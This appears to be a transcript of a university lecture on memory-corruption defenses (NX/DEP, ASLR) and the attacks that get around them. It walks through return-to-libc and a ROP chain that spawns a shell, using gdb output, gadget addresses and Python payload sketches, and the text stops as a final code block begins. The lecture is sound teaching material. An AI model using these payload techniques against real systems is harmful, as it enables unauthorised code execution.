Alright, folks, so we are at the tail end of application security, so today we'll learn about modern defenses and modern exploitation techniques. Is there any more homework? It's just the project. We'll see. We're going to be a little flexible with this, depending on how fast we cover things. Okay, so we've now looked at all types of memory corruption attacks, right? So fundamentally, what do we mean when we talk about memory corruption? What can an attacker do on the system or to our process? Yeah, that's a type of memory corruption. But what is memory corruption? What's the goal of it? Yeah. "To change the saved EIP so that when the function returns, it calls whatever code you want?" Alright, more broadly, right? Generally, corruption means that the attacker can write to memory that they shouldn't. Very broadly, right? What they want to do with that depends on their goals, right? They can change the EIP, they can do all kinds of stuff. So there has been a lot of research over the years on how we can actually prevent these memory corruption vulnerabilities. Why is this so difficult? What makes this difficult? We need to write to memory, right? The program needs to write to memory. It stores its values in memory, its variables in memory, right? And fundamentally it's difficult to know: is this write to memory good, because the program intended it to happen, or is it malicious, because an attacker is tricking the program into doing it? Right? And furthermore, it may be fine that you can write to a certain location, but if you're able to write a certain value to that location, that's what causes the problem. Right?
So fundamentally, even though on the surface buffer overflows seem kind of easy to prevent or think about, right, you should just check the size of the buffer before you write to it, in general memory corruption is incredibly difficult to prevent, and that's why there are still many buffer-overflow-type vulnerabilities and memory corruption vulnerabilities today. So the best way to prevent this is to just write programs that don't have these vulnerabilities. Right? Have you ever written a non-buggy program in your life? What was that? "Hello world." Hello world? You can even mess that up. I'll tell you, it must have been my first or second year here. I'd been programming for, I don't know, a long time at that point, and I wrote like a 20-line Python script and it actually worked the first time without any bugs. I was shocked. I actually spent more time looking at the code afterwards because I didn't believe that it was actually correct. So think about how hard that is for 20 lines; any sufficiently complicated program is going to be essentially impossible to write correctly. Right? So another way is to just say, hey, never use C or C++, use some other language that completely eliminates this entire class of vulnerabilities. So what do you think? Is this good advice? Is this how we can prevent these? "It depends on the platform. If you need the benefits of C, like if you're programming on Linux, I guess, or if you need the performance, then you can go for C. If you don't, then maybe it's safer to use Java." So it could be for performance reasons that we choose one over the other. Let me check to make sure... Okay. So yeah, we can do this if we want slower programs in general, right?
So do you think we completely eliminate this problem if we move on to Java or Python or Ruby? Well, the interpreters have bugs too. So what's the JVM written in? C or C++, I don't know, it's one of the two, right? And so what if there's now a memory corruption vulnerability in the JVM itself? Is that a good trade-off? Is that a bad trade-off? Yes, you're passing the bug on to the JVM, right? And you can say that, hey, just like you aren't going to worry too much about bugs in the operating system, there always will be some, you can only control your own application code, right? But I think the counterpoint to this is when you look at browsers, right? Browsers essentially execute JavaScript, right? By design, there are no memory corruption vulnerabilities in JavaScript itself, but JavaScript programs run in browsers and are interpreted by JavaScript engines, which are written in C++ for performance reasons. And very frequently, I don't know the exact stat, but I think at least once a month would probably be a good baseline, there are vulnerabilities that allow JavaScript executing in the browser to execute arbitrary code on your system, right? And it has been this way for years. So another thing we can do is say, hey, let's try to find the vulnerabilities before they are exploited, right? So let's statically analyze the code to try to identify all the vulnerabilities before we execute it. So this is actually a huge area of research, and it's part of what our research tries to do: automatically find bugs and vulnerabilities in a program. The problem is that... Have you heard of the halting problem? Can somebody restate the halting problem? "You can't really say for sure whether or not it's actually going to complete..." What? "You can't say whether or not you're going to find all the bugs in it."
What is the halting problem in general? So what does the halting problem say? "I think it says that you can't ever determine whether or not a program will finish, whether it terminates correctly." Yes, but I'm rephrasing it slightly: you can't write a program that's able to tell whether another program will terminate or not on all possible inputs, right? It turns out that you can reduce the halting problem to this problem of finding every single security vulnerability in a program: if you could find every vulnerability, you could solve the halting problem. And so fundamentally, we cannot write a program that can find all security vulnerabilities in another program. It's fundamentally impossible. If it was easy, then it wouldn't be a fun research area, right? So it's very difficult to actually do this. And so it's all about making trade-offs. You're always going to make mistakes in one direction. Either you say there's a vulnerability when there isn't one, or you miss a vulnerability. Those are your two options. "So does the halting problem fundamentally tell us that we cannot ultimately make any system 100% secure?" I don't know that the halting problem says that. I would say the halting problem basically says you can't write a program to verify another program, right? Whether something is fundamentally secure is also very difficult to say conclusively, right? So we'll leave that. The other way to prevent this is to make exploitation harder, right? So the idea is that by raising the bar and making it more difficult to exploit, and we'll see what we mean by more difficult here, we can stop kind of your run-of-the-mill attackers. We may still have those advanced, state-level, well-funded attackers that can still exploit stuff. The other way to think about this is detection, right? So prevention means, hey, let's stop it from ever happening. So can we ever get 100% prevention?
No, there are always going to be some problems. So we also need detection, because we need to know when something bad happens. Right? So for detection, we can try to perform checks on the program during execution. So as it's executing, you can have it try to examine its environment. We can try to analyze the system calls that it's making, essentially build a profile for each application and see when it's executing weird system calls. You can detect write-then-execute action sequences. This is really popular in Windows malware: write out to a file and then execute that file. We can do integrity checking. So during runtime we can check maybe the saved EIP to make sure it hasn't been tampered with before we return. So we're going to look at making exploitation more difficult, because there are a lot of technical areas here. And we're going to go kind of semi-historically through how things were developed. So the very first thing people thought of was, hey, part of what makes exploitation really easy is that the stack is executable. Right? So you can jump to code on the stack and it'll start executing. Should a normal program ever need to execute something on the stack? What would need to? Let's flip that around. Is it true that no program ever needs to execute code on the stack, or in writable memory generally? "An interpreter might need to start executing some code on the stack, potentially." Close. Interpreter is not quite the right word. So an interpreter is interpreting the text and executing its own code depending on the program. And a compiler is going to generate the code beforehand. There's something that's kind of in between. How does Java get to be so fast? "JIT." Yes, it has a just-in-time compiler. So it's interpreting the bytecode, but when it notices a sequence that's being executed over and over, it compiles it to x86 code and then executes it.
So fundamentally, a JIT engine has to take some data, write it into memory, and then execute it. So JITs basically blur the distinction between data and code. So you can't just mandate this for every single program, because there are some programs that actually need this functionality. But we can at least make it the default in the compiler to compile code with a non-executable stack. That way, we can make sure that this technique is applied to the widest array of programs. And if your program needs to disable this, it has to ask for that explicitly, which is how we compiled all of the levels, basically, for this challenge. So how is this actually done? On Linux, there is an NX bit, so the kernel uses this Physical Address Extension, PAE mode, and basically the NX bit marks a region of memory as non-executable. So in this way, it's able to say, hey, this memory region is not executable. There are other names for this technology. DEP is Microsoft's implementation, so it's Data Execution Prevention: preventing data from being executed. It will use hardware support, so if the hardware supports this no-execute bit, it will use it. Otherwise, it will emulate it in software, which will obviously be slower. Kind of the first implementation of this was W^X, write XOR execute. So, exclusive or: you can either write to memory or you can execute memory, but you can never do both at the same time. So you can see the naming scheme gets nerdier; OpenBSD chose this one. It's really a nerdy name for this. So basically, you never have memory that's both writable and executable at the same time. But as we just talked about, if you need to write a JIT, fundamentally, you need to do this. You need to write out some bytes and then you need to execute those bytes, which actually makes sense now when we talk about, well, this is how a lot of the...
how JavaScript is able to break out of the browser's JavaScript VM, because the JavaScript code is literally being compiled into x86 code, and then, using some exploit, it's able to change the control flow of the application to get it to execute its own little code segment. So there are a couple of different ways you can do this. So, how does this change things? Let's assume that the stack is no longer executable. How does our classic buffer overflow attack change? "We can't put our shellcode on the stack anymore." Why? "Not executable." Not executable. Can we put it in the environment? No, that's also on the stack. Can we put it in the heap? We didn't talk about it, but that's also going to be non-executable. You don't need your heap to be executable. Right? So the question is, what do we do? Are we dead in the water? Can we not do anything? "You could overwrite the global offset table to go somewhere you want to go." But where do we want to go? "A C function, or a libc function?" Ah, so the key thing is that now we can no longer put our own code into the program. Essentially, if we try to inject our shellcode into the program, anywhere we can write it, it doesn't do anything. It can't be executed. But there's actually a lot of functionality that's already exposed to the application. So why don't we try to reuse some library function or something? So that's where we get into this basic technique called return-into-libc. So what's a libc function that we might want to target? Let's think about this. What would our shellcode want to do? "Run /bin/sh." Run /bin/sh. What are some of the library calls? Yeah, there's system, which you used in, what was that, assignment one? Assignment one seems like forever ago. So system is a libc function that takes in a string and executes some program.
So what if we're able to call system with the argument /bin/sh? So essentially what we're going to do is still use a buffer overflow; we're still going to overwrite the stack. But now the address that we jump to is going to be the function system, and we're going to set up the stack in such a way that system thinks it was called with the argument /bin/sh. Essentially we're setting up a fake call frame for system. And any function that's currently linked into the program, we can execute. So this is actually a nice technique if the program itself offers this functionality or has something that we want. Remember, by controlling the EIP we can jump to any function in the program that we want, and by controlling the stack we can pass it any arguments that we want. So we often want system. One other thing we can do, if there is some section of memory that is executable, is string-copy our shellcode there, which is cool. What area other than the stack is typically executable and writable? I honestly don't know; you'd have to look at the memory segments to see if that program said it needed one. Another thing you can do is copy the shellcode somewhere, and then there are other library functions that change the permissions of a page, so you can say this memory page is now executable and then you jump to it. So you can do cool stuff like that. But we first need to find the address of system in memory. So we can use the debugger, or we can use /proc. So we'll look at this with the same simple program, right? So we have our program's main, we're copying argv[1] into the buffer foo and then returning 10. We've already seen all this, so we're not going to go over it. We can compile it with this command, and you may not notice, but I will tell you that the option for an executable stack is now gone. So if you compare this to the commands that we used before, you'll see that now we no longer have an executable stack.
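As a rough illustration of the fake call frame for system described in this passage, here is a minimal Python sketch of how the overflow bytes might be laid out. The helper names p32 and fake_call_frame, the placeholder addresses 0x11111111 and 0x22222222, and the filler values are all hypothetical and chosen only for illustration. The sketch assumes 32-bit x86 with the usual C calling convention, where a function expects its return address at the top of the stack on entry and its first argument in the slot just above that.

```python
import struct


def p32(value):
    """Pack a 32-bit value as little-endian bytes, the way x86 stores it."""
    return struct.pack("<I", value)


def fake_call_frame(pad_len, saved_ebp, func_addr, fake_ret, arg0):
    """Build overflow bytes that make the callee see a normal-looking call.

    Layout, from low to high addresses:
      padding   fills the local buffer
      saved_ebp overwrites the saved base pointer (value is arbitrary here)
      func_addr overwrites the saved EIP, so `ret` jumps to the function
      fake_ret  what the callee will treat as its own return address
      arg0      what the callee will treat as its first argument
    """
    return (
        b"a" * pad_len
        + p32(saved_ebp)
        + p32(func_addr)
        + p32(fake_ret)
        + p32(arg0)
    )


# Hypothetical placeholder addresses; real values must come from the
# target process (for example from a debugger session).
SYSTEM_ADDR = 0x11111111   # assumed address of system()
BINSH_ADDR = 0x22222222    # assumed address of a "/bin/sh" string

payload = fake_call_frame(50, 0x65646362, SYSTEM_ADDR, 0x62636465, BINSH_ADDR)
print(payload.hex())
```

The fake return address only matters after the called function finishes, so a filler value is enough when the goal is simply to get a shell.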
And you can tell by using the readelf command to show you all the sections. So here it would tell us that, let's see, the stack is only readable and writable, so it is not executable. And here you don't have anything that's both writable and executable, so you wouldn't have anywhere to put shellcode. So we've now compiled this program into a new binary where the stack is not executable. We can run it: we'll set a breakpoint on main, we'll run it with some foo parameter, and then we'll print things out. So remember, when the program loads, the dynamic linker is going to load the libc library into memory, so you can print out the address of system using the debugger, and it'll say it's at 0xb7e66310. And I think when we go back we should see libc and ld-linux. Okay. So if you do info inferior, sorry, I didn't properly do the new lines here, we can see that we're process ID 14077. So this is telling you the process ID of what's currently being executed; this is our a.out. And then, this is actually a cool thing inside gdb: if you put an exclamation point at the start of the line, it will execute the rest as if it was typed in the shell. So here this will cat out /proc/14077/maps. So this is the /proc file system that we talked about; it gives you information about the process. Here the maps file shows you the memory mappings, and it says that our a.out is mapped at memory region 0x08048000 to 0x08049000, and it's readable, not writable, but it's executable. And it shows you that another section of a.out is at 0x08049000 to 0x0804a000, and this one is only readable, and so on and so forth. So it has all of the sections. So what's the difference between this and the ELF information? This is loaded with all the libraries, so this is the actual running process; this is the memory layout of the process. You can do this to inspect any process that's running as your user, that you have permissions to. And so we can see in here that we have the libc .so file.
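To make the maps listing discussed above a little more concrete, here is a small Python sketch that parses text in the /proc/PID/maps format and reports which mapping contains a given address. The function names parse_maps and find_region are made up for this example, and the sample text is illustrative only: the a.out ranges and the address 0xb7e66310 follow the lecture, but the paths, inode numbers, the end of the libc range, and the stack range are assumptions.

```python
def parse_maps(text):
    """Parse /proc/<pid>/maps-style text into (start, end, perms, path) tuples."""
    regions = []
    for line in text.splitlines():
        # Fields: address range, permissions, offset, device, inode, [path]
        fields = line.split(None, 5)
        if len(fields) < 5:
            continue
        start_s, end_s = fields[0].split("-")
        path = fields[5].strip() if len(fields) > 5 else ""
        regions.append((int(start_s, 16), int(end_s, 16), fields[1], path))
    return regions


def find_region(regions, addr):
    """Return the region containing addr, or None if it is unmapped."""
    for start, end, perms, path in regions:
        if start <= addr < end:
            return (start, end, perms, path)
    return None


# Illustrative sample, NOT real output from the lecture's machine.
SAMPLE_MAPS = """\
08048000-08049000 r-xp 00000000 08:01 1234 /home/user/a.out
08049000-0804a000 r--p 00000000 08:01 1234 /home/user/a.out
b7e26000-b7fcb000 r-xp 00000000 08:01 5678 /lib/i386-linux-gnu/libc.so.6
bffdf000-c0000000 rw-p 00000000 00:00 0 [stack]
"""

regions = parse_maps(SAMPLE_MAPS)
hit = find_region(regions, 0xB7E66310)   # address reported for system()
print(hit)
```

On a Linux system the same parser could be pointed at the contents of /proc/self/maps, or at the maps file of any process the current user is allowed to read.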
So this is where libc is being loaded, and we can see in here that this section is readable and executable, and 0xb7e66310 should fall within that range. And we can actually see there's other stuff: there's a loader that gets loaded somewhere else, so we have all kinds of cool stuff. So we now have the address of system. So if we overwrite the saved EIP with this address, 0xb7e66310, the start of the system function will start executing; sorry, I said printf. But what we want to pass in is /bin/sh. So how do we get /bin/sh into the program, now that we have no shellcode? We can put it into an environment variable, or we can put it into an argument, but then we have to know exactly where that location is in memory, right? And if we're already relying on the fact that system is at this fixed location, why don't we try to find the string there, actually? So it turns out, and I would never have guessed this in a million years and I still don't know why, that /bin/sh is actually located in libc. So there's this string, /bin/sh followed by a zero byte, in libc. So this is actually a super cool gdb command to search for bytes. You first give it the start address you want to search from, this 0xb7e26000, which is the start of this segment here, and you'll find that in my case the string /bin/sh is at 0xb7f8684c. And this is true for a lot of versions of libc. I still don't know why; I'll look it up some day. And so we can print out the string at that memory location, and it'll tell us, yeah, /bin/sh is there. So we actually already have all the ingredients we need: we have system loaded at this location, and we now have the string /bin/sh. So let's call system. So now we're going to run this. Just like before, remember, we have 50 bytes in the buffer, so we have 50 bytes of a's, then we have the saved EBP, and now we want to go to the address of system, which was 0xb7e66310, and we want the argument to be 0xb7f8684c. So this should be the argument to system; that should be the string /bin/sh. So let's see. So I basically
set a breakpoint here on this call. So right before the call, this is what the stack looks like, and after the call, we've overwritten our buffer with 50 a's, we've overwritten the saved EBP with 0x65646362, we've overwritten the saved EIP with the address 0xb7e66310, and then we've overwritten the word above that with 0xb7f8684c. So let's go check and make sure this is right. So 0xb7e66310 is the address of system and the one ending in 84c is the string: 84c and 310. So let's walk through this step by step so we know exactly what's going to happen here. We're going to move 10 into EAX; now that I've reviewed this so much, I wish I had removed that part. Then when we leave, we're going to set the stack pointer to the base pointer and then we're going to pop EBP. So that's going to move the stack pointer up here, and it's going to put 0x65646362 into EBP. Now we're going to return, which is what we wanted, and we're going to return to the address of system. So system has a bunch of code, it's going to start executing, it's going to push EBP, and we're just going to go. And if we continue, it's going to tell us that there's a syntax error, EOF in backquote substitution, and then it's going to say that it received a segmentation fault here at 0xb7f8684d. So why? What's the problem here? Is it the string? No, we looked at the string in gdb; we said x/s, so it printed it out as a string, and it was there. Is it when system is returning back to where it was called? No, we should have seen a shell first if system had been called correctly. So these are all the things I thought of, because I did it like this and I got this error after making all these slides, and then I had to figure out what went wrong. So I put all of this on the slides, and then I said I'll keep it and use it as a teaching moment. "Do you need an argument array that has /bin/sh in it?" No, that's if we're calling execve. Here, system is a
function that just takes in a character pointer. So we know from here that we actually got to the address of system and started executing the system function. "Is it the base pointer?" System sets up its own base pointer. "Did we overflow something?" Nope. Put yourself in system's perspective. So let's completely get rid of everything below the line, below the arrow. When a function is called, right when system is called, what should be exactly at the stack pointer? The saved EIP. Because right before you call a function, what does the stack look like? Argument zero is on top: we push the arguments on from right to left, so argument zero will be exactly at the stack pointer. Then we say call system, and the call instruction will push the return address onto the stack, the saved EIP. So this is the stack as it looks according to system right now. According to system, what's argument zero? 0xbffff714, exactly right. And what system thinks is the saved EIP is 0xb7f8684c. So this is exactly the problem. When we look at it here, according to system, this is the saved EIP and this is argument zero. What is that value actually? It's not really important what it is; what's important is that we passed the wrong argument to system. So this is where creating a fake function frame comes in, right? We don't only want to overwrite the saved EIP with the address of system; we want to create a stack such that when system starts executing, it thinks it was called with the argument /bin/sh, right? So to get this arg zero in the right place, we need four more bytes in between: the overwrite with the address of system, then four bytes, and then the address of /bin/sh. That's what we're going to try here. We'll do bcde, then the address of system, then edcb, and then the address of /bin/sh, so that it'll finally work. And to see why, we'll look at the stack here, and we'll see that after the call we've overwritten
the saved EBP, we've overwritten the saved EIP, and then above that is what system thinks is its saved EIP. So actually, like you said, after system is done executing it's going to try to start executing from 0x62636465, which should crash the program, but at that point we've already got a shell, so we don't care where system returns. And then above that is arg zero, and if there were any more arguments to system, those would go above that. So here, when we get to system, we have the saved EIP and arg zero. So this is the return-to-libc technique: essentially, by creating this function frame on the stack, we're able to completely control the arguments that are passed to a function. And not only that: as we just said, when system returns, the next thing that will start being executed is at that 0x62636465, so if there's another function we want to call, we can put its address there and that function will be executed afterwards. So if we do this in a clever way, we can chain multiple functions together, but you need to be very careful with how the stack looks. So this completely gets around the non-executable stack. So does a non-executable stack solve buffer overflows and memory corruption vulnerabilities? No, I hope not, because I just showed you an attack that worked against it. But what did I have to know in order for this attack to be successful? I needed to know the address of system and the address of /bin/sh. So that led to essentially the next evolution in defenses. People said, aha, if you have to know my memory addresses, well, I'm going to randomize them every time I execute. So: address space layout randomization. The short version is ASLR; I'll never use the long version again. It randomizes the position of the heap and the stack. The program's code? No, well, it depends on the system; I think on Windows it may. But it also randomizes dynamically linked libraries, so it moves around everything like libc. So every time you run the program, libc will be in a different location. But if you're moving around the
library, you need to compile that library so it is relocatable, so there are no fixed addresses in there. And so not every library will use ASLR, and some libraries will exist at fixed locations, which can be a way around ASLR. So this basically makes return-to-libc incredibly difficult, because the library addresses need to be guessed. But how do we get around this? "Brute force." So one question is, depending on the implementation, how much entropy is there actually, right? And so on 32-bit you can actually get around ASLR pretty easily: in about 32,000 attempts you're likely to get it correct. So that's pretty cool, right? So it can still be vulnerable. 64-bit is much more secure; the address space is much larger, so there's much more room to move code around. But this is always one of the things you should think about, right? If you can't break it, just guess. As an attacker, fundamentally, you only need to be right once, whereas the defender needs to be correct every single time. What's another way to break it? What does the whole scheme rely on? So there could be a problem in the way the OS generates that random number; maybe you're on the same system and you're using the same source of entropy, or a bad source of entropy. But let's say the random number generator is great and everything is moving around. Let's say we have a memory corruption vulnerability. What can the attacker do with a memory corruption vulnerability? Overwrite, so they can write to memory. What does a printf vulnerability allow us to do? Read, read from memory. So now let's say you've randomized everything. If I use a printf vulnerability to start reading from the stack, the things on there are pointers to some place in memory, and those will be at fixed offsets: no matter where you move things around, each pointer on the stack will point to some fixed offset within its region. Let's say somewhere
on the stack you have a pointer into libc. All I need to do is read that pointer, and now I know exactly where your whole libc is located, and then I can do a really easy return-to-libc attack. So as ASLR gets more popular, it increases the significance of these, what do they call them, memory leaks. Leaking memory addresses becomes much more severe. Previously a leak was not really that severe unless it exposed sensitive data, but here literally every single pointer in memory is sensitive, because leaking one of those pointers can tell you where all of the code is located and where the data is located. ASLR on Linux is enabled by default. There's a setting that you can use to control it at runtime. So by default the stack will be randomized and all of the libraries will be randomized; the code will not be randomized by default. So you can disable this while you're testing things. You can't do this on my system, obviously, change this setting. This is why I actually created a wrapper for levels 5 through 9. I don't know exactly which ones actually need it, but I think it's fine to use this wrapper, which disables ASLR just for that program. I was slightly worried about you guys finding some setuid vulnerability and then becoming root, so I figured, to make that more difficult, I'm enabling ASLR for the whole system and only disabling it for these binaries. So yeah, address leaking. So we think that with this we've made buffer overflow exploits significantly more difficult, and we've made return-to-libc significantly more difficult. It makes sense: everything's moving, so how can you possibly jump to some known code? And this was probably one of those... sorry, I forgot about the paper, I don't have it with me. So it turns out that we can actually generalize this return-to-libc approach. Return-to-libc started executing at the start of each
function, and it would execute the whole behavior of that function. It turns out that, A, oftentimes the code of the binary itself is not randomized at all; it's at a fixed location, just as we saw in that maps file. So the code of the application itself is not randomized. But that seems like it doesn't help us, because the code of the application doesn't call system or call execve with whatever arguments we want. But it turns out we can completely generalize this approach and use little pieces of code, what we call gadgets, that do one thing and then return. So for instance, one that will pop EBP and then return, or one that will add one to EAX, as we'll see. So the idea is, instead of executing entire libc functions, let's just find super tiny pieces of functionality that we can use that are followed by a return instruction. "2005?" There you go. So actually, for a long time people kind of thought that this problem was solved, essentially: hey, buffer overflows are a thing of the past, we're moving on to other vulnerabilities; we did ASLR, we did non-executable stack, boom, there's no way around those. And then around the 2004-2005 time frame that started to change. So this paper, if you want to get super into ROP, is really good: "The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls." Yeah? "Does it have metadata?"
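As a rough sketch of what looking for such gadgets can mean in practice, the Python snippet below scans a blob of bytes for two short x86 sequences that end in a return: pop ebp; ret (bytes 5d c3) and inc eax; ret (bytes 40 c3). The function name find_gadgets, the toy byte blob, and the base address are assumptions made up for this example; a real search would run over the executable sections of the target binary. Because x86 instructions are variable length, a plain byte search like this can also match in the middle of longer instructions.

```python
def find_gadgets(code, pattern, base=0):
    """Return every address where `pattern` occurs inside `code`.

    `base` is the address at which `code` is assumed to be loaded.
    """
    hits = []
    pos = code.find(pattern)
    while pos != -1:
        hits.append(base + pos)
        pos = code.find(pattern, pos + 1)
    return hits


# 32-bit x86 encodings of two tiny gadgets, each ending in `ret` (0xc3).
POP_EBP_RET = bytes([0x5D, 0xC3])   # pop ebp ; ret
INC_EAX_RET = bytes([0x40, 0xC3])   # inc eax ; ret

# Toy stand-in for a chunk of executable memory (hypothetical contents).
blob = bytes([0x90, 0x5D, 0xC3, 0x90, 0x40, 0xC3, 0x5D, 0xC3])
BASE = 0x08048000                   # assumed load address of the blob

pop_hits = find_gadgets(blob, POP_EBP_RET, BASE)
inc_hits = find_gadgets(blob, INC_EAX_RET, BASE)
print([hex(a) for a in pop_hits], [hex(a) for a in inc_hits])
```

Each address found this way is a candidate value to place on the stack where a saved return address is expected, so that a return instruction lands on the gadget.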
No, I don't believe so. I think the OS handles everything, so without breaking the OS you can't know any of the offsets. And similarly, with the /proc file system that we saw, if the process is running as a setuid program, you can't access it, so you wouldn't be able to see that. Okay, so we'll look at this. So let's look back at our nice little program: still the same code, still the same everything, but now we're going to compile it with different options. Actually, the only one on here that we'll talk about later is -fno-stack-protector; the others have nothing to do with security. So the preferred stack boundary option just means the buffer is actually 50 bytes instead of having some more stuff here. But what does this -static do? Does that have anything to do with security? Yeah, so we compile the libraries in statically, so we're no longer using the dynamic libraries, and we can see that it made the binary a lot bigger: this simple file is now 716,000 bytes. This actually happens a lot, or you can say we're simulating a very large program with this, for what we want to do here. But we've gotten rid of all the other security protections here. So we need to find some gadgets in the binary that will perform some different actions, and what we want to do is essentially encode our shellcode into these little gadgets, right? What does our shellcode want to call? What function? No, no, system was for return-to-libc. execve. We want to call execve, which is a syscall. So what do we have to do for that? We need to put 11 in EAX. What else? We need to call int 0x80 eventually, at the end. We need to put /bin/sh in EBX, a pointer to /bin/sh, and then null in... no, not ECX. And then what about EDX?
Either null or a pointer to null, whatever we can do, in edx. Then we call int 0x80. So the idea is we're going to find little gadgets, we're going to chain them together to accomplish the same thing, and essentially encode our shellcode into these gadgets. So what do we need? Well, like we said: 11 in eax, the address of /bin/sh in ebx, the address of an array holding the address of /bin/sh followed by null in ecx, and null in edx. The question is where we can put /bin/sh. Now, we cannot rely on /bin/sh being at a fixed location. So let's say we can write somewhere: where do we actually put /bin/sh? Can we write it onto the stack? Let's say we can write to any fixed address; can we write it onto the stack? We can't write it onto the stack, because with ASLR we don't know where the stack is, so we need to find some other place to put it. So we can use readelf to look at all the sections here, and we can see that there's a lot, but we can see that, hey, the .data segment that holds the writable data of the program is at a fixed memory location. We know this because we know the code is fixed and it references the data in .data directly, so both of these are fixed and don't change with ASLR. And we can see that it starts at 0x080EA060, and what's the size?
0xF20, which is a lot of writable data that we can write to, and we know that this memory location is fixed. So if we write the string /bin/sh there, we're going to be good. So we need to find a gadget. The first thing we need is a write-something-to-an-address gadget. So we'll search, and we'll see how to do this later; you can actually use grep or whatever other cool stuff you want. We find that in the program at 0x0809A67D there's a gadget that writes eax into the location pointed to by edx, so it's a dereference: we're moving whatever's in eax to wherever edx points, and then we return. All we need is these 3 bytes somewhere in executable memory. So this gadget will copy whatever's in eax into the memory location that edx points to, and we're going to use this as our first gadget. As long as we can control eax and edx, we can put the string "/bin" into eax and the address of .data into edx, then start executing this gadget, and it will write "/bin" at that memory location. Then we do it again: set up eax with "//sh" and edx with the address of the next 4 bytes, so .data plus 4, and it will write "//sh". Then it will write a 0. So we can use this as, functionally, a write-something-somewhere, but we need more gadgets: we need to be able to control eax and edx. So we can search some more, and we find that there's a pop edx gadget: at 0x0806E91A there's pop edx followed by return. This gadget will take whatever's on the top of the stack and put it into edx. How does this help us? Why does this help us? We control the stack. Fundamentally we're overwriting the stack, we're going to overwrite saved EIP, and using that we can also put data on the stack that will end up in the edx register. So we can test this out; we'll just test this one gadget. We're putting the address we want to go to as 0x0806E91A, and so what value do you think is going to end up inside edx when that gadget executes? Afterwards the stack looks like this: we have 50 a's, we have 0x65646362, we have
our saved EIP that we've overwritten, and above that we have 0x62636465. So this is where we're going to execute. We step through: we leave, we return, and now we're executing here. So now what's going to happen? What's going to go into edx? 0x62636465, essentially whatever was right above that gadget's address on the stack. If we go back to the ROP payload that we generated, we can see here is the address of the pop edx gadget, and whatever was after it got copied into edx by that gadget. So after this is done, after it pops, what are we going to return to? What's the next thing that's going to happen? A segmentation fault: it'll try to execute at bfff700 and it's going to error out. But here we can see that by putting the value on the stack as part of our exploit, as part of our stack overwrite, that gadget will copy whatever is above it on the stack and put that into edx. So we can use this as a building block. So we have this pop edx; ret gadget, but we need to not only control edx; we need to control what else? eax. We also need to control ebx, ecx, edx, all of them, A, B, C, D, all of those registers. So we'll find a pop eax; ret at edb6d6, a pop ebx; ret at 0x080481C9, a pop ecx, and an xor eax, eax. Why is this important? It zeros out eax, which is nice. We could use a pop eax, but then what would that mean we'd have to have on the stack? We'd have to have zero as part of our ROP payload, which as we've seen is problematic, so we want to avoid null bytes whenever we can. Right? And then we found an inc eax; ret at this location, and we can easily find an int 0x80, so there's an int 0x80 at this memory location. This is actually everything we need in order to do, I think, almost any arbitrary computation, and that's essentially what this paper showed: you have a Turing-complete language, and you can create a ROP payload to do anything. And they were arguing, hey, as programs get bigger they'll have more and more gadgets, and there are more things that you
can actually do. So we're going to build our ROP payload: we're going to build our shellcode and encode it as a ROP payload, and it's usually called a ROP chain. I don't know about you, but doing this by hand with little endian and all that would kill me. So a, you have all the little-endian handling and all the data written right in the Python script, so it's nice there, and b, we can actually write things in the correct order. So I'll show you how to do this. The struct module is your absolute friend when you're doing this: there's a pack function that takes an integer and packs it as either little endian or big endian, so we can use this function and actually have readable, very cool looking, well, not cool looking, numbers that actually make sense based on what we want to do. So we're going to start our payload by creating this object p, and remember what we're trying to do conceptually: we first want to copy the bytes "/bin" to .data. So p is going to be the payload. We know we first need 50 a's and then a saved EBP to get to the saved EIP. So what do we have to do next? Our goal is to copy the bytes "/bin" to .data. What do we need to do? What should be in edx? The address of .data. What should be in eax? "/bin". And then we call the gadget that writes eax to where edx points, and then we do other stuff. So we're going to build up our ROP payload. This is how we use the pack function. I honestly can't remember exactly, but the first parameter is a format parameter; it allows you to specify different formats. I think it's the angle bracket that tells it little endian, and then the I, I think, tells it that it's a 32-bit value, so 4 bytes. So it's going to convert this integer for us. This is going to be 0x0806E91A: we're going to pop edx and then return. So this means what needs to be the next value in our ROP payload? The address of .data: whatever we put next is going into edx, so we'll put the address of .data next. And then we want, which
gadget can we write now? What are we going to return to? What gadget do we want to execute next? Pop eax. So we want to pop eax and return, and we want to put the string "/bin" into eax. And now we want to go to our write gadget, the write-what-where. So when this gadget executes, it will move the bytes "/bin" to the address of .data. So when those gadgets execute, we've now copied those bytes there. Are we done? No, we need to copy "//sh" to .data plus four. Why plus four? We've already put four bytes there and we don't want to overwrite those bytes, so we want to start at plus four. And we don't want to include a zero in our ROP payload, so we don't do "/sh" plus null, because that null would have to be inside of our string. So now we'll do the same thing, and we have to do this for everything. So we're going to pop edx, and the important thing here is that the address ends in 064, so this is four bytes further on. We're going to pop eax with "//sh", then we're going to call the write gadget, and so now we've moved that there. So now we have the string "/bin//sh" at the address of .data. Next, what do we need to do? Zero: we need to make sure it's null terminated, right? So we need to copy null bytes to what exact address in relation to .data? .data plus eight, there we go. So this is ...068, which is eight bytes above .data. Then we go to our xor gadget: we're going to xor eax with itself, zero that out, and after that we go to the gadget that moves eax to where edx points. This will move zero into 0x080EA068. So now we have eight bytes of our string and a null terminator, a null-terminated string. Are we done? No, we still have other stuff to do: we have to set up argv and the environment pointer. So now we know we have the string "/bin//sh" at a fixed location in memory that will never change across executions of this program, no matter what the ASLR status is: at 0x080EA060. So we're going to build the argv vector. Where should we put it? We don't know what's in
esp, and we don't have any gadget to get esp; we only have popping into things. Maybe if we had one we could use it. But "/bin//sh" is at .data: we have eight bytes of our string, then four bytes of zero, so starting at .data plus 12 is free. So we can put it there. But what do we need to put there? Yes, we need to put the value 0x080EA060. And then is that it? What do we have to do after that? We're going to put zero afterwards; we need to make sure there's a zero afterwards. So, same thing: we pop ...06C, so .data plus 12, into edx. We pop 0x080EA060 into, not .data, sorry, into eax, so this value is going to go into eax. Then we write: at 0x080EA06C we write the value 0x080EA060. Now we can add the null, so we do the same thing to add null at .data plus 16. If you're really clever you can move these around so you can reuse the fact that eax was null at that other write, but when you're doing it by hand you want to make sure that this stuff is precise. Are we done? What do we need to do next? Set up the environment. For the environment we actually have two choices: we can use the address of whichever location was null, so we can just reuse one of those. So that's what we have to do. Yes, where does that go?
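The memory-writing part of the chain described so far can be sketched roughly as follows. The addresses of .data, the pop edx gadget, and the write gadget are the ones quoted in the lecture; the pop eax and xor eax addresses are placeholders, since the recording does not give them clearly, and the helper names (`addr`, `write_word`, `write_zero`, `simulate`) are made up for this sketch. The small simulator only models these four gadgets so the result can be checked without running an exploit.

```python
from struct import pack

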